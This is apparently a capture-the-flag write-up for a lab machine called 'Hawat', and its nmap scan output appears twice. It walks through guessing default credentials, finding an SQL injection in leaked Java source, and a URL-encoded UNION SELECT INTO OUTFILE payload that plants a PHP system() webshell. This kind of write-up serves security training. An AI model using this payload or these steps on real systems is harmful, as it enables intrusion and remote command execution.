Hawat

Target IP: 192.168.171.147

Challenge Description: 1.21 GigHawats.


Reconnaissance

ec8a5928f42fe18f6f17d57405b58502.png
Running an nmap scan shows there are four TCP ports open on the target machine, as shown above.

22/tcp    open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open  unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>Issue Tracker</title>
|     <link href="/css/bootstrap.min.css" rel="stylesheet" />
|     </head>
|     <body>
|     <section>
|     <div class="container mt-4">
|     <span>
|     <div>
|     href="/login" class="btn btn-primary" style="float:right">Sign In</a> 
|     href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
|     </div>
|     </span>
|     <br><br>
|     <table class="table">
|     <thead>
|     <tr>
|     <th>ID</th>
|     <th>Message</th>
|     <th>P
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
30455/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
22/tcp    open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open  unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>Issue Tracker</title>
|     <link href="/css/bootstrap.min.css" rel="stylesheet" />
|     </head>
|     <body>
|     <section>
|     <div class="container mt-4">
|     <span>
|     <div>
|     href="/login" class="btn btn-primary" style="float:right">Sign In</a> 
|     href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
|     </div>
|     </span>
|     <br><br>
|     <table class="table">
|     <thead>
|     <tr>
|     <th>ID</th>
|     <th>Message</th>
|     <th>P
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 10 Sep 2023 19:13:11 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
30455/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15

Performing an aggressive nmap scan using the command sudo nmap -sV -A 192.168.171.147 -p 22,17445,30455,50080 against the open ports returns the result above. By the looks of it, there is one SSH on port 22, and the rest of the open ports are running HTTP applications.


Enumeration

Port 17445: HTTP
ea3360fd7dd56f77958d63cc276b34e6.png
Browsing to this port displays the webpage above. It looks like some sort of issues tracking application.

1b2413fa480bfd0ade504c825781b58d.png
I registered a new user with the credentials test:test. And using this new user, I am able to see the different users of this application. One user that stands out to me is clinton, as shown above. I changed the password of the user clinton to test using the Edit button from the image above, but I am unable to perform anything useful. I performed a directory search against this web application and found /login and /register, but I did not find anything useful.

Port 50080: HTTP
a00659b160df8de663a418b15bec6c82.png
The webpage above is shown for this web application.

d3ad0f47c95669a05c78ae29a688d040.png
Doing a directory search against this application returns the result above. The directory /cloud sounds interesting.

1ef745452ce28ba35f379b4df1e0a0c7.png
Browsing to /cloud returns the login webpage above for this application. It informs me to login, but I have not found any credentials so far.

3b1c80752345f6a49abb67bedd959f82.png
Using the credentials admin:admin, I gained access to this web application. The webpage above is shown after logging in successfully as the user admin. There are interesting files, such as issuetracker.zip, that I have access to on the target machine.

8d8cb7264d12ff888ef38750a66c8764.png
Opening the issuetracker.zip file displays the contents shown above inside this directory. I also tried uploading a PHP web shell, but I could not access it. Time to enumerate harder. I downloaded the issuetracker.zip file on my machine.

13e3c2bb819977a1038493b3628fa1b3.png
Running tree shows the contents of the Java application above. There are some interesting Java files.

0990efab6e51867f312ddaa52b383c33.png
After some enumeration, I found something interesting: the Java class file IssueController contains the juicy information above. Not only does it contain the hard-coded credentials that can be used after exploitation, it looks like the target machine is vulnerable to SQL injection as shown above. The parameter priority can be used with the URL mapping /issue/checkByPriority to perform this SQL injection.


Exploitation & Flag

07aca8d9057899becd4f2b286b1d6544.png
I URL-encoded the payload Normal' UNION SELECT "<?php echo system($_GET['cmd']);" INTO OUTFILE '/srv/http/cmd.php'; -- to upload my PHP webshell.

947ea08dbc00a77c834ef595fe3b6329.png
After URL encoding it, I sent it at
http://192.168.171.147:30455/issue/checkByPriority?priority=Normal%27%20UNION%20SELECT%20%22%3C%3Fphp%20echo%20system%28%24_GET%5B%27cmd%27%5D%29%3B%22%20INTO%20OUTFILE%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B%20--%20 to the target machine via POST method as shown above.

150ca365cedee1ca3bb361336f64f0ed.png
And now I can access my webshell, as shown above using the parameter cmd at http://192.168.171.147:30455/cmd.php.

2fe47617e70dfd8dc3dbddf12149829b.png
And the proof.txt flag is shown above. GG.